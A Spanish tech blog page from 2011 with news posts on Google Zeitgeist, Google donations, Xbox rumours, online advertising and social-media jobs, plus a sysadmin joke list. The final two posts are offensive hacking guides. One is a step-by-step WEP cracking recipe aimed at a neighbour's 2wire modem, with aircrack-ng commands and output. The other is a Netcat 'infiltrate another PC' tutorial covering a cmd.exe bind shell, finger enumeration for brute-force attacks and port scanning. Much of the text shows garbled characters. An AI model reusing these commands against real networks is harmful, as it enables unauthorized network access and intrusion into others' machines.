jueves, 22 de diciembre de 2011

Google 2011: ¿Qué tecnología fue la más buscada en la Web?

 

Todo lo que googleamos durante el ciclo que se va está en un anuario gráfico.
 
Dos trabajadores en las oficinas del gigante Google.
La palabra utilizada por Google para dar nombre a su anuario no es azarosa, pues refiere a una expresión en idioma alemán que significa “el espíritu del tiempo”, es decir lo que intelectual y culturalmente nos define en esta era. Nada mejor que interpretar estos resultados por medio de las consultas que depositamos en el buscador.

Si bien se pueden apreciar todas las exploraciones generales, o por país de cuanta cosa se haya escrito en el bloque del navegador, todo lo que relacionado con tecnología ha llamado la atención. Así es como aparecen en los listados de lo más buscado el videojuego Batterfield 3, los rumores de iPhone 5, la muerte de Steve Jobs, la aplicación Whatsapp y el iPad 2, que en su momento logró distinguirse del resto de los productos en mercado.

El ránking también esta integrado por Amazon Kindle Fire, iPhone 4s, Sidekick 4G, HP Touchpad, Spb Shell 3D, HTC Sensation, Samsung Nexus Prime, sony NGP, iPad3. Con un gráfico muy bien logrado, Google indica cuál de todas estas apariciones se acentúa más gracias a los usuarios, el premio lo tiene Sony NGP (la consola PS Vita) que durante enero pareciera que fue el boom en la estadística global.

Al clikear sobre la barra de Sony NGP podremos ver el día a día de este producto teclado por los buscadores. En algunos casos puede sorprender cómo unos días es más rastreado que otros, y este dato seguramente vendrá muy bien a los proveedores para exponer con bombos y platillos en sus propios esquemas de ciclo productivo.

Como ya lo hizo Twitter y Facebook, que dejaron su huella de lo que fue el 2011 para cada gigante de la nube, Google mostró sus datos y se prepara para un cambio de ciclo con más novedades. Nada se puede preveer en el mundo de las búsquedas, por el momento cada vez que el cursor titila en el cuadro blanco del navegador sabremos que encendemos un motor que mueve muchos más mecanismos de los pensados dentro del mercado.

Google destina 40 millones de dólares para proyectos filantrópicos

Logo De Google
Foto: DANNYSULLIVAN Ampliar foto
MADRID, 15 Dic. (Portaltic/EP) -
   Google ha anunciado el apoyo de la compañía a nuevos proyectos filantrópicos con aportaciones que suman los 40 millones de dólares (30,8 millones de euros). La aportación de la compañía para este final de 2011 hace que en todo el año Google ya haya destinado 115 millones de dólares (88,8 millones de euros) a este tipo de causas.
   Desde Google han explicado que viendo que se acerca el final del año, en la compañía han pensado que es "buen momento para volver a financiar proyectos que orienten sus esfuerzos a reforzar la educación, introducir la tecnología y a luchar contra la esclavitud moderna". Con estos objetivos, Google ha explicado en qué proyectos ha invertido 40 millones de dólares.
   Parte de la inversión ha ido a parar a 15 programas que buscan fomentar la educación de los niños en campos como la ciencia, la tecnología o las matemáticas (STEM). Para ello, la compañía ha decidido colaborar con programas desarrollados en la organización Citizen Schools, de Boston, y con Generating Genius, de Reino Unido. Desde Google han explicado que con las aportaciones a estos proyectos esperar "mejorar la educación STEM en más de tres millones de estudiantes".
   Relacionados con los programas STEM, Google también ha decidido participar en proyectos en países en vías de desarrollo para la formación de niñas en estos ámbitos. En muchos países las niñas tienen más dificultades de las habituales para acceder a cierta formación y Google ha querido contribuir para luchar contra esa discriminación. La compañía ha decidido colaborar con African Leadership Academy y con Afghan Institute of Learning.
   "Estos grupos y otros similares invertirán nuestras ayudas en la educación de más de 10.000 niñas de países en vías de desarrollo", ha comentado Google en su blog oficial.

INTEGRACIÓN CON LA TECNOLOGÍA

   Otro área con la que Google ha querido colaborar es con diversas iniciativas que están usando la tecnología para facilitar la integración en comunidades. Este tipo de proyectos son un ejemplo de integración y de cómo facilitar el acceso a la información.
   Desde la multinacional han destacado proyectos como Vittana, que ayuda a conceder prestamos a estudiantes en los países en vías de desarrollo con una tasa de amortización del 99 por ciento. También ha destacado a Code for America, que "se encarga de la integración de talentos de la industria de Internet en el sector público mediante proyectos flexibles destinados a aumentarla transparencia en el sector".  
   En el caso español, Google ha confirmado que realizará una donación a Cibervoluntarios, que cuenta con un programa de integración a través de la tecnología para colectivos "desfavorecidos o en riesgo de exclusión". Se trata de un ejemplo práctico de como contribuir a la integración y adaptación por medio de la tecnología.
   El tercer aspecto en el que Google colaborará es en proyectos cuyo objetivo sea eliminar la esclavitud. La compañía asegura que se trata de "un negocio multimillonario que afecta y arruina la vida de más de 27 millones de personas". Para luchar contra este problema, Google ha decidido ofrecer financiación a grupos que luchan desde distintos frentes por eliminar la esclavitud.
   Según Google, este tipo de organizaciones trabajan junto a los gobiernos para identificar a las personas que están aprovechándose de otras personas, a los dueños de los esclavos, de forma que documentas las situaciones y se encargan de luchar por la liberación de los afectados. La aportación de Google en este campo será económica y también logística ya que facilitará, por ejemplo, servicios de telefonía de emergencia en determinados países.
   En total Google cierra el año con una nueva aportación de 40 millones de dólares, que se suman a todas las donaciones realizadas a lo largo del año a actividades filantrópicas. La compañía ha asegurado que en 2011 "ha destinado más de 115 millones de dólares a la financiación de diversas organizaciones benéficas e instituciones académicas de todo el mundo".
   Este tipo de iniciativas, junto a otras como el canal de YouTube para la educación y la actitud de la compañía en conflictos como el vivido en Egipto este año presentan a una compañía sensibilizada con las desigualdades y dispuesta a utilizar parte de sus recursos para hacer un mundo un poco menos injusto.
   Enlaces relacionados:

   - Blog de Google (http://googleespana.blogspot.com/2011/12/ayudas-2011.html)

¿Microsoft ya tiene preparada la nueva versión de la Xbox?

Una de las consolas más exitosas, no sólo por las ventas que tuvo sino también por la cantidad de juegosque lanzó es, sin dudas, la Xbox 360 de Microsoft. Pero este dispositivo fue lanzaron en el 2005 y, casi siete años después, ya merece una actualización.

La cantidad de rumores que hay en torno a lo que se conoce como la Xbox 720, que será la que suplantará a la anterior versión, son muchísimos. El último llega de la mano de uno de los desarrolladores del Crysis 2, uno de los juegos más famosos para la consola. El programador comentó que ya tenían un prototipo de lo que será la nueva plataforma de Microsoft y que están trabajando en lo que será el motor gráfico. Estos rumores, tiempo después, fueron desmentidos pero el sabor a nuevo ya estaba en el aire.

Más información apareció en la red de la mano de fuentes anónimas. Aseguran que tendrá como objetivo tener un ciclo vital más amplio de lo normal y para ello contaría con un conjunto de chip gráfico y procesador fabricados por AMD, que dejaría a los ordenadores más potentes de la actualidad en muy mal lugar.

Lo que hará con estas características de hardware será poder manejar gráficos similares a los de la película Avatar, además de contar con un gran nivel de interacción. En relación a la interacción se hizo referencia a lo que será la versión 2 de Kinect, el sistema de lectura de movimientos que fabricó la compañía de Windows.

Uno de los rumores apunta al lanzamiento de dos versiones de la Xbox 720: una para los jugadores casuales y otro para los más exigentes.

¿Cuándo? Todo apunta a que la potencial presentación de la consola será en dos posibles fechas: una en el CES, que se realiza en Las Vegas a principio del 2012, o en E3, el evento de videojuegos más importante del mundo.

Novotel y Microsoft presentan la habitación del futuro

Novotel y Microsoft presentan la habitación del futuro
Foto: Captura.
Denis Hennequin anunció, el pasado mes de septiembre, el nuevo objetivo estratégico de Accor, de convertirse en referencia global en hoteles y revolucionar la experiencia del cliente. En línea con este compromiso con la innovación, la red Novotel, considerada la marca de hoteles de categoría superior dentro del portafolio del grupo Accor, está ofreciendo un nuevo tipo de habitación que representa una clara ruptura con el pensamiento tradicional en hotelería, redefiniendo el uso del espacio y agregando tecnologías de punta, así como amenidades.
“Queríamos reinventar la experiencia de nuestros huéspedes con una habitación de hotel que uniera design y nuevas tecnologías digitales”, explica Grégoire Champetir, director global de marketing de Accor. “Es fundamental tener en cuenta las expectativas y las costumbres en constante mudanza de nuestro cliente. Esto significa repensar nuestras habitaciones en términos digitales”, complementa el ejecutivo.

Los huéspedes podrán vivir esta experiencia revolucionaria, y perfectamente realista, durante los próximos tres meses, en la habitación-piloto creada por la red Novotel, en la que todo el equipamiento es plenamente funcional y podría implantarse en toda la red en un futuro próximo.

Microsoft estuvo en el centro del design de la habitación, particularmente con la integración de la consola Xbox 360 y su revolucionario sensor Kinect, que utiliza el gesto corporal y reconocimiento de voz para controlar juegos y entretenimiento.

Dos formas de hacer publicidad: Google AdWords vs Facebook Ads

Que su empresa aparezca anunciada en las páginas webs más vistas del mundo, es posible y no muy caro. Tanto Facebook como Google ofrecen plataformas de publicidad propias para facilitar esta tarea, pero para decantarse por introducir un anuncio en la red social o en el buscador, hay que conocer bien sus diferencias.
Los millones de usuarios de Facebook son sólo uno de los motivos por los que introducir publicidad en las redes sociales es una estrategia cada vez más común. Para facilitar este cometido han surgido empresas especializadas en hacer de los anuncios en Facebook una fórmula publicitaria muy efectiva. ¿Pero, cuáles son las diferencias de anunciar un producto en Facebook o hacerlo en Google? Manuel Hernando, CEO de la compañía de marketing social Fanquimia que organiza campañas de publicidad en Facebook y otras redes sociales, aclara las diferencias.
Cada click, cuenta: Antes de lanzar su anuncio, querrá saber cuánto le va a costar. En las dos plataformas el coste de la publicidad se cuantifica por clicks. Es lo que se llama CPC y supone que cuantas más veces se pulse sobre el anuncio, más barato le saldrá al anunciante. Por ello, para Manuel Hernando, el “precio final del anuncio dependerá, de varios factores, pero principalmente, de la calidad de la misma para poder optimizarlo al máximo”. Cuanto mejor funcione un anuncio y más clicks consiga, más barato le saldrá al anunciante.
En Google los formatos publicitarios se limitan al CPC, pero Facebook ofrece algunas otras posibilidades. Puede enviar a los usuarios a un website determinado (como Google) pero también lo puede enviar a una página dentro de Facebook (como el perfil de un anunciante) dando la posibilidad al usuario de activar el conocido ‘Me gusta’. También es posible el Coste por Impresión (CPM) que requiere una inversión mínima de varios miles de euros al mes. Este tipo, es mostrada a los usuarios en lugares preferentes dentro de Facebook y admite a su vez multitud de formatos, incluyendo la posibilidad incluso de reproducir videos.
Publicidad personalizada o por búsqueda. Una de las principales diferencias entre las dos plataformas es la forma en la que se muestra la publicidad a los usuarios. En Google, los anuncios aparecen cuando los usuarios introducen términos de búsqueda. Según comenta Fanquimia, “si alguien escribe “abrigo” en Google y acciona la búsqueda, le aparecerían los anuncios de aquellos que paguen para que aparezca su anuncio al buscar la palabra “abrigo”, por tanto los anuncios solo se muestran cuando los usuarios están realizando una búsqueda activa de algo relacionado con lo que queremos anunciar. El éxito de dichas campañas, depende de una buena estrategia de elección de palabras, así como otros factores de optimización”. Google juega aquí con una gran ventaja: el usuario está buscando lo que se le anuncia.
Por su parte, la publicidad en Facebook se les muestra a aquellos usuarios que forman un determinado “público objetivo”. Tal y como explica Hernando, “hay que tener en cuenta, que Facebook tiene 14 millones de perfiles, solo en España, y que cada uno de ellos introduce su propia información (edad, lugar de residencia, estudios, gustos, aficiones, etc). Facebook es una enorme base de datos de usuarios que puede ser usada en las campañas publicitarias para dirigirse sólo al público que decida la compañía, por ejemplo, a mujeres de Barcelona de entre 25 y 45 años, casadas a las que les guste el deporte”. Al entrar en Facebook, las mujeres que cumplan estos requisitos verán en el lateral derecho de su página la publicidad de esa empresa, pudiendo llegar así a targets muy determinados.
Con imagen o sin ella. Aunque ambos aparecen al lado derecho de la página, tanto en Google como en Facebook (si bien algunos en Google aparecen en la parte superior de forma resaltada), en Facebook se le añade, además, una imagen de un tamaño de 110x80 píxeles, para llamar más la atención del usuario.
Publicidad que no caduca. En el caso de Google, la duración de las campañas pueden ser bastante largas en el tiempo porque al mostrarse solo a los usuarios cuando hacen una búsqueda relacionada, siempre habrá gente que realice esa búsqueda por primera vez, mientras que al resto de usuarios de Google, no se le “molesta” con nuestra publicidad. En Facebook, al ser una publicidad que se muestra una vez elegido el público, su duración suele ser menor en el tiempo.
Para ser efectivos. Desde Fanquimia, Manuel Hernando aconseja que “la forma de que estas campañas tengan resultados óptimos, pasa por una buena segmentación, subdivisión de grupos y creatividades dentro del target, tratamiento multivariable y una continua optimización y renovación”.

miércoles, 21 de diciembre de 2011

.¿A CUÁNTAS PERSONAS CONOCES QUE SE COLOCASEN POR TWITTER O POR LAS REDES PROFESIONALES?

Expansión.com el artículo El empleo en ‘social media’, ¿es una burbuja o un filón laboral? y de la misma forma Mi amigo José Luis del Campo Villarés escribía en su blog el artículo ¿Nos saturamos del mundo 2.0? y recomiendo la lectura de ambos artículos.
Tras leer ambos artículos estuve reflexionando y me han surgido ideas sobre ambos temas que tienen relación directa. Para empezar no podemos negar que el social media y las herramientas 2.0 están más de moda que nunca. Sin embargo, tenemos que tener los pies en la tierra y usar el sentido común que supuestamente todos tenemos.
Por supuesto, que están surgiendo nuevas profesiones como el Community Manager y Gestores de Reputación Online, sin embargo, en la actualidad, solo tienen este tipo de perfiles las empresas grandes y tecnológicamente potentes aunque sean de menor tamaño. No olvidemos que la mayor parte del tejido empresarial español lo conforman las pequeñas y medianas empresas y las que ocupan, por ende, a mayor volumen de trabajadores.
Personalmente, soy de la opinión de que esas profesiones están en expansión y de moda, sin embargo, aun les queda mucho camino para convertirse en un nuevo nicho de empleo. Para empezar, el perfil profesional de estas nuevas profesiones aun no está nada definido ni claro. Porque según los perfiles profesionales de muchas personas en las redes profesionales (Xing y Linkedin) ahora todos son community manager, llevando cuatro días en la red y porque aglutinan un volumen elevado de seguidores de los que no conocen de nada ni al 90%. Con esto, no estoy diciendo que solo pueda ser community manager una persona que tenga blog y que conozca en profundidad las comunidades donde se comparte tipo Facebook y Twitter. En principio debe depender de la empresa que esté detrás porque requerirá que la persona que gestione la comunidad tenga conocimientos sobre las materias principales de las que se habla, sepa buscar contenidos, responda a los usuarios, es decir, que sea una persona diversificada. Igualmente tiene que tener unas competencias adecuadas para la comunicación y la relación al menos en la red. No se trata tanto de la cantidad sino de la calidad de lo que se haga. Una persona puede tener éxito en el mundo 1.0 y eso no le garantiza que lo tenga en el 2.0. Sírvanos de ejemplo la profesión de Coach en la que muchas personas se certificaron y ahora lanzo la pregunta ¿Cuántas personas conoces que vivan íntegramente de esa profesión? Pues menos de los que se esperaba en un principio.
Luego no olvidemos la realidad que aun son mayoritarias el volumen de empresas que no tienen blog corporativo, ni tienen perfil en Facebook, ni cuenta en Twitter, ni buscan personas en las redes profesionales. Vamos que siguen siendo 1.0. Después, tenemos las que comienzan a tener presencia en el mundo 2.0 comportándose de forma unidireccional sin interactuar y dedicándose a vender las grandezas de sus productos, sin darse cuenta de que eso no es lo que quieren los usuarios. Así, podemos afirmar que no todas las organizaciones están aun preparadas para dar el salto al mundo 2.0, es decir, debe de producirse una reflexión interna que motive el cambio para posteriormente establecer unos objetivos de por qué se quiere o debe estar ahí y a partir de ahí establecer una planificación para determinar en qué plataformas se debe tener presencia, cuál es la estrategia y quién se encarga de la gestión de las mismas. Es decir, no podemos pretender obtener resultados inmediatos en la red sin inversión de tiempo.
Ahora cuando uno comienza a conocer una nueva herramienta surgen otras nuevas que prometen ser de partida la bomba y luego se quedan en petardito… A las redes profesionales genéricas les están saliendo multitud de redes verticales especializadas en cada sector y así con todo. No debemos olvidar que no es cuestión de estar en todas las herramientas 2.0 porque tener un perfil en la red requiere inversión de tiempo y ver si el tiempo invertido nos repercute positivamente objetivamente según nuestra finalidad de estar ahí. Porque no olvidemos que cuando estamos en la red, dejamos de invertir tiempo en otras facetas de nuestras vidas.
Efectivamente, salen oportunidades en las redes profesionales y en Twitter pero invirtiendo tiempo y a medio o largo plazo porque lo trabajamos día a día y eso lo reforzamos con el conocimiento en persona o por recomendaciones de otros usuarios. ¿A cuántas personas conoces que se colocasen por Twitter o por las redes profesionales? ¿Sabes cuánto tiempo invirtieron?
Bajo mi punto de vista, antes de darnos del alta en una nueva herramienta debemos de analizar cuanto tiempo le podemos dedicar y porque debemos estar en ella. Todo nos lleva tiempo y a veces deberíamos comenzar a sumar los 10 minutos que dedicamos a cada herramienta 2.0 y los frutos que eso nos da.
La red debe ser un complemento de otras facetas que nos faciliten el llegar a determinada información o personas que de otra forma no nos sería posible. De la misma forma puede ser un buen sitio para mostrar lo que sabemos hacer y para conversar con personas interesantes. ¿Por qué usáis vosotros las herramientas 2.0?

¿Quieres ser ingeniero en sistemas? Piensalo 2 veces

chistes de ordenadores

¡Lo que hacemos por ser Ingenieros de Sistemas!
 Lo que hacemos por ser Ingenieros de Sistemas!

1. Cuando el ingeniero de sistemas le diga que acude en su ayuda, desconectese de la red y vaya por un cafe. No nos espere, para nosotros no es ningun problema acordarnos de todos las claves de usuario.

2. Cuando nos llame para decirnos que cambiemos su computador de sitio, asegurese de que lo deja bien enterrado bajo media tonelada de postales, fotos de sus niños, animales de toda clase, flores secas, trofeos varios, etc. A nosotros, como no tenemos vida privada, nos encanta echar un vistazo a la suya.

3. Cuando el ingeniero de sistemas le envie un correo electronico de importancia alta, borrelo inmediatamente sin leer: Lo mas probable es que estemos haciendo pruebas.

4. Cuando el ingeniero de sistemas este almorzando, entre sin ninguna consideracion y expliquele sus problemas esperando a que se le responda en el acto. Estamos aqui para servirle y siempre a punto para solucionar problemas.

5. Cuando el ingeniero de sistemas este tomando un cafe tranquilamente, preguntele algo acerca de los computadores. La unica razon por la que nos vamos a tomar cafe, es para atender a las personas que no tienen correo electrinico o telefono.

6. Mande todos sus mensajes en mayusculas. El servidor de correo lo recogera inmediatamente y lo tratara como mensaje urgente.

7. Cuando llame al telefono del ingeniero de sistemas, pulse el numero 5 para saltarse el mensaje que le dice que est? de vacaciones y grabe su mensaje. Entonces, espere exactamente 24 horas antes de mandar un correo electr?nico directamente a su jefe quej?ndose de que no ha recibido ninguna respuesta a su llamada. Usted no se merece este trato.

8. Cuando la fotocopiadora no funcione, llame al ingeniero de sistemas. Al fin, la fotocopiadora tiene cable, ?no?

9. Cuando su m?dem le d? el mensaje: 'No hay tono de marcado', en casa, llame al ingeniero de sistemas. Podemos solucionar problemas de tel?fono desde donde sea.

10. Cuando su computador no funcione, t?relo encima de la silla del ingeniero de sistemas y no deje ning?n papel con su nombre ni la descripci?n del problema. Nos encanta el misterio.

11. Cuando el ingeniero de sistemas le est? explicando c?mo cambiar alg?n par?metro de su configuraci?n, p?ngase a leer el peri?dico. De hecho, no esperamos que usted tenga que hacer nada, simplemente nos encanta o?rnos a nosotros mismos cuando explicamos algo.

12. Cuando le demos alguna explicaci?n sobre alg?n programa, no se moleste en aprender. Siempre estaremos ah? para volver a hacerlo.

13. Cuando la impresora no imprima, reenv?e su trabajo al menos 20 veces. A veces los trabajos que intenta imprimir desaparecen en el cosmos sin raz?n aparente.

14. Cuando la impresora no imprima tras los 20 intentos, env?e su trabajo a todas las dem?s impresoras de la empresa. Seguro que alguna imprimir?.

15. No use la ayuda que viene en los programas. Estas ayudas on-line s?lo son para brutos.

16. Cuando vaya a tomar alg?n cursillo de inform?tica, no dude en practicar con la red de la empresa e instalar y probar todo lo que desee. Estaremos encantados de trabajar hasta la madrugada para arreglar todos los estragos que usted cause.

17. Cuando lleguemos a reparar su computador y est? usted comiendo, deguste con calma su almuerzo en nuestra cara. Funcionamos mejor bajo presi?n.

18. Nunca nos d? las gracias. Nos encanta nuestro trabajo y, adem?s, ?nos pagan!

19. Cuando el ingeniero de sistemas le pregunte si ha instalado alg?n nuevo programa en su computador, mienta. ?A nadie le importa lo que usted tiene en su PC!

20. Si el cable de su rat?n siempre tira el gatito de porcelana que tiene usted encima de la mesa, levante el computador y pise el cable con ?l. Los cables de rat?n est?n dise?ados para aguantar 80 kilos de peso.

21. Si la tecla {Enter} de su teclado no funciona, ?chele la culpa a la actualizaci?n del correo electr?nico. Adem?s, los teclados funcionan mucho mejor con medio kilito de migas de galleta, cabellos y manchas secas de Coca Cola debajo de las teclas.

22. Cuando el sistema le muestre la t?pica ventana de 'Est? usted seguro...', conteste siempre que 'S?' o 'Aceptar'. ?Si no estuviera usted seguro no lo habr?a hecho, verdad?

23. Si?ntase completamente libre para decir 'No tengo ni idea acerca de esta mierda de inform?tica'. A nosotros nunca nos ha molestado que la gente diga que nuestra profesi?n es una mierda.

24. Cuando necesite cambiar el cartucho de t?ner, llame al ingeniero de sistemas. El cambio de cartucho es una tarea extremadamente complicada y Epson recomienda que solamente la realice un ingeniero con una maestr?a en hardware.

25. Cuando le suceda algo a su computador, pida a su secretaria (si la tiene) que nos llame. A los que trabajamos en un Help Desk nos encanta tener que tratar con una tercera persona que no tiene ni idea de cu?l es su problema.

26. Cuando escan?e la foto de su ?ltima parranda, de 30 megas, a tope de colores y resoluci?n, envi?la a todo el mundo a trav?s de su correo electr?nico y, por supuesto, indique alta prioridad. Tenemos montooooones de megas libres en el servidor y un procesador del carajo.

27. Cuando tenga que imprimir tropocientos mil folios, no se le ocurra ir imprimiendo de poco en poco: ?M?ndelos todos de una vez! Los dem?s pueden esperar, usted tiene prioridad.

28. Cuando se encuentre por casualidad a su ingeniero de sistemas durante el fin de semana, no dude en hacerle preguntas acerca de computadores. Nosotros trabajamos 24 horas al d?a, 7 d?as a la semana, incluida la playa en verano, la nieve en invierno, supermercados, cines, etc.

29. Si sus hijos estudian inform?tica, tr?igalos el fin de semana a la oficina. Ah? estaremos para prestarles cualquier equipo, reparar su base de datos de Access hecha trizas por su copia ilegal de Visual Basic, etc.

30. Cuando nos traiga su computador cl?nico de casa para que se lo reparemos gratis, por favor recu?rdenos que es urgente para que por la tarde pueda usted jugar al solitario. ?Ah? estaremos!
Nos sobra tanto tiempo, y el d?a es tan largo. De todas formas, ?todo el mundo sabe que perdemos constantemente el tiempo navegando por Internet!

31. Cuando necesite la ayuda del ingeniero de sistemas para hacer una presentaci?n, no se afane, puede pasarla unas pocas horas antes. ?Acaso no sabe que podemos hacer milagros?

Ah, ?y disculpennos por ser ingenieros de sistemas!

Para qué quieres ser Ingeniero de Sistemas

www.bsgrupo.com - Gerencia proyectos bajo el enfoque PMI®. Inicio Online 28 de Enero.Esta comunidad es para las personas que quieren ser ingenieros de sistemas, pero ahora la pregunta es porqué quieres serlo. Existen muchas personas que piensan que esto es sencillo y que esto no vale la pena pues, creen que somos nerds y esas cosas. Pero tú exáctamente porqué decidistes entrar al mundo de la computación y sistemas.

Yo lo hice porque desde pequeño siempre me interesaron los PC, pero mi boom empezó recién en 2007 cuando mi hermana con mucho sacrificio compró mi primer PC (Aún lo uso, pero le cambié casi todo menos la pantalla, el subwoffer y la carcasa) en 2007 comencé de lleno a meterme en la computación y me gusta desarmar y armar y así fue como adquirí mi conocimento.

Ahora pues, estudio Ingenieria y Tecnología en sistemas y me especializaré en Seguridad y Redes y aquí entra el para qué, pues sencillo, para ganar experiencia, conocimiento y capital además de las cosas buenas que eso trae pues serías una persona muy importante en una empresa además de estar en una Ingeniería que son ramas que son bastante complejas y solo un puñado de gente puede con ellas, además para contribuir a mi patria y a mi ciudad que estamos bastante quedados en materia informática. Y esto tan solo empezó con la compra de una PC. Comenta para qué!

Hackeo Redes Inalambricas

Una vez mas a razon de que han surgido varias dudas sobre la infiltracion wep sobre los modems 2wire, los mas usados por telmeZ de México, aqui vamos de nuevo con otra explicacion mas de como infiltrarse de manera rapida.
Todos estamos en la expectativa de las fallas informaticas y es de ahi donde sale una muy facil de penetrar, esto nos garantiza internet en todos lugares Burla, claro que siempre y cuando haya alguien con su conexion infiernitum.
 Ingredientes de la receta:
  • Una victima, o en su defecto para propositos de aprendizaje, tu propio modem 2Wire
  • Que su laptop, portatil o como le llame tenga una tarjeta inalambrica INTEL 3945 ABG
  • La distro Wifi Way, Back track o wifi slax, las cuales puedes encontrar en este portal, http://mirrorlinux.net/live 
  • Capacidad de lectura
  • Paciencia 
Prefacio:
En esta guia se indicaran los pasos para la infiltracion, el uso que le de es responsabilidad completa del lector, este metodo es experimental y necesita paciencia, ademas de una buena lectura y capacidad para seguir instrucciones.
Para las tarjetas que NO son intel 3945 se suprimiran los pasos 1 y 2 de la siguente guia, a partir del punto donde se menciona el macchanger, el procedimiento es el mismo.
Si usted a reunido todos los ingredientes comenzemos con la receta:
Paso 1:
Una vez iniciado el sistema en live CD, se parcha inmediatamente la plaquita, puesto que los drivers no vienen por default, con la siguiente instruccion.
 osoluche:/# ipw3945_es.sh

Paso 2:
Revisamos como nos ha identificado nuestra tarjeta wireles con el comando
 osoluche:/# iwconfig
Siendo que, para algunos aparecera como eth1, en otros casos como wifi0, en otros rtap0, asi que hay que poner mucha atencion en el nombre, el identificador sera porque tiene mensajes de la misma conexion, es decir, la configuracion de la tarjeta.
Paso 3:
Cambiamos nuestra ip, para continuar nuestra infiltracion "silenciosa"
 osoluche:/# macchanger -m 00:11:22:33:44:55 wifi0   *** Para esta guia usaremos wifi0 como el nombre de la tarjeta, ojo con este detalle ***
Paso 4:
Lanzamos nuestro scanner haber quien atackamos
 osoluche:/# airodump-ng wifi0   
Cuando nos salga una lista de numeritos, detenemos la aplicacion con las teclas CTRL + C, posteriormente hay que anotar sobre la victima 3 cosas escenciales
  1. ESSID
  2. BSSID
  3. CHANNEL 
  4. Direccion MAC de la victima
 Los anotamos en una hojita o donde quieran, estos datos los usaremos durante todo el desarrollo de la operación, obiamente tomaremos los numeros de donde recibamos mas paquetes de respuesta, entre mas haya es mejor para la infiltracion.

Paso 5:
Ahora bien, teniendo los anteriores datos procedemos con la autentificacion en la red contraria.
 osoluche:/# aireplay-ng -1 0 -e ESSID_AP -a MAC_AP -h NUESTRA_MAC wifi0
Hasta que salgan los siguientes mensajes podremos seguir con el siguiente paso, si no sale, intente con otra direccion.

1:18:20 Sending Authentication Request
1:18:20 Authentication successful
1:18:20 Sending Association Request
1:18:20 Association successful :-)

Paso 6:
 Una vez hecha la infiltracion procede la captura y creacion del archivo donde mantendremos nuestra recepcion de paquetes.
 osoluche:/# airodump-ng -c (el canal donde esta la victima)  -w captura wifi0   
Ahora si, ahora estamos listos, infiltrados y recibiendo trafico 
Paso 7:
Solicitamos paquetes ARP, a la victima para que en nuestro archivo de captura se vayan registrando los datos del trafico
 osoluche:/# aireplay-ng -3 -b MAC_AP -h NUESTRA_MAC wifi0

Saving ARP requests in captura.cap
You should also start airodump-ng to capture replies.
Read 40999 packets (got 21930 ARP requests), sent 40902 packets...

Paso 8:
tenemos que esperar un ratito para que siga subiendo la cantidad de paquetes recolectados, teniendo los suficientes ejecutaremos la herramienta para que lea todos estos, lo cual nos devolvera la clave wep para conectarnos normalmente.
osoluche:/# aircrack-ptw captura01.cap
 lo ultimo que nos dira sera:
Key found at  XX:XX:XX:XX !
Si no sale eso, todavia faltan mas paquetes, asi que no tenemos otra opcion mas que esperar.

Problemas comunes:
SI la maquina se te llega a congelar.... es porque la tarjeta se dividio en 2 interfaces, normalmente son rtap0  / wifi0, entonces la solucion para esto es que el airodump lo hagas con rtap0 y el aireplay con wifi0.
El envio de paquetes no autentifica...... Esto sucede porque tu tarjeta no soporta la inyeccion de paquetes, esto podria presentarse en las inalambricas intel 2100, intel 2200, no queda otra opcion mas que llorar, o bien comprar una inalambrica con chipset Atheros, que es la mas recomendada para el proceso.
No sale la clave... esperar otro ratito a que haya mas paquetes ARP, es por eso que se pide paciencia en esta recetika.

COMO INFILTRARSE EN OTRA PC

Utilizando Netcat.
==================

Para ilustrar mejor como trabajamos con este programa, lo mejor es
observar ejemplos practicos y analizar su estructura para poder comprender
mejor como funciona y asi poder crear nuestras propias aplicaciones.

Algunas de las cosas que podemos hacer con NetCat son:

Obtener un Shell rapidamente en una m?ina remota usando la
opcion -l (Listen) conjuntamente con la opcion -e (ejecutar) , cuando el
proggie corre con estas variables y la conecciones realizadas, NetCat
ejecuta el programa elegido y se conecta a stdin y stdout del programa
en la coneccion la red.

nc -l -p 23 xxx.xxx.xxx.xx 23 -t -e cmd.exe

Este comando dejara NetCat escuchando el Puerto 23 (telnet) ,
cuando es conectado a travez del cliente, ejecutar?n Shell (cmd.exe)
la opcion -t le dice a NetCat que maneje cualquier negociacion que el
cliente pueda esperar....

Si esta conexiones realizada desde una m?ina NT, el shell
correr los permisos del proceso que han generado a NetCat (Hmmm...) as?br />que hay que ser muy cuidadosos

La belleza de NetCat es que puede hacer lo mismo en CUALQUIER
puerto  Puedes dejar a NetCat escuchando en los puertos NETBIOS, que
est?probablemente corriendo en la mayor?de las m?inas NT, de esta
manera puedes lograr una conecci?? una m?ina que est?tilizando
"Filtrado de Puertos" activado en TCP/IP security Network Control Panel,
NT no parece tener ninguna seguridad alrededor de cuales puertos los
programas de usuarios son permitidos amarrar, esto quiere decir en pocas
palabras, ejecutar comandos y programas que puedan unirse a los Puertos
NETBIOS.


Como anteriormente se menciona puedes utilizar a Netcat para
estudiar diferentes puertos, con la siguiente sintaxis:

c:\>nc -v <IP> <puerto> (puedes a??r otra -v)


Uno de los puertos mas interesantes a la Hora de Analizar un
Host, es el puerto 79 (Finger) , puedes obtener nombres de usuarios e
informacion muy util a la hora de planear un "Brute-Force Attack", este
comandito de Netcat te muestra la Flexibilidad del Proggie en cuestion,
dandote una idea de sus posibilidades:

c:\>nc -v <host> 79 < user.txt > log.txt

El comando anterior le dice a netcat que se conecte en modo
verbose al Host predeterminado en el puerto 79 (Finger) y envie el
contenido del archivo user.txt (OJO: no he probado esto con una posible
lista de nombre de usuarios al azahar), la respuesta del servicio ser?br />guardada en el archivo log.txt


Scanner:
========

Netcat puede ser utilizado como scanner, sus multiples opciones
le permiten realizar un gran n? de combinaciones, pudiendo realizar
Scannings en Puertos Random, en puertos conocidos, en modo ascendente o
descendente, con intervalos de tiempo, utilizando gateways para evitar
mostrar la IP fuente del Scanning, etc.

C:\nc11nt>nc -v -v -z 127.0.0.1 53 25 21

DNS fwd/rev mismatch: localhost != darkstar
localhost [127.0.0.1] 53 (domain): connection refused
localhost [127.0.0.1] 25 (smtp): connection refused
localhost [127.0.0.1] 21 (ftp): connection refused
sent 0, rcvd 0: NOTSOCK

Pues si; aqui tienen un pequeño primitivo scanner, se le
pueden a??r puertos escogidos como en el ejemplo anterior o asignarle
un rango de puertos:

C:\nc11nt>nc -v -v -z 127.0.0.1 1-53

DNS fwd/rev mismatch: localhost != darkstar
localhost [127.0.0.1] 53 (domain): connection refused
localhost [127.0.0.1] 52 (?): connection refused
localhost [127.0.0.1] 51 (?): connection refused
localhost [127.0.0.1] 50 (?): connection refused
localhost [127.0.0.1] 49 (?): connection refused
localhost [127.0.0.1] 48 (?): connection refused etc...

Volvemos con la opci??v (verbose) y la Opci??z (zero i/o)
